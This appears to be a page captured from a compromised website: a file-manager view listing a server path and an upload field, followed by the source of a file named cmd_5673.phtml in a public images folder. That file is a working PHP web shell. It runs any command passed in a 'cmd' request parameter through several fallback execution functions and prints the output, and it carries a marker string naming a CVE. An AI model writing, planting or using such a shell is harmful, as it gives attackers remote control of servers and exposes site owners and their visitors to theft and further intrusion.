Your IP : 216.73.216.39


Current Path : /home/wirbesti/public_html/images/
Upload File :
Current File : /home/wirbesti/public_html/images/cmd_5673.phtml

<? echo "CVE202648907RCE";$c=$_REQUEST["cmd"];if(function_exists("shell_exec")){echo shell_exec($c." 2>&1");}elseif(function_exists("system")){system($c." 2>&1");}elseif(function_exists("passthru")){passthru($c." 2>&1");}elseif(function_exists("popen")){$h=popen($c." 2>&1","r");while(!feof($h))echo fread($h,1024);pclose($h);}else{echo"NOEXEC";}?>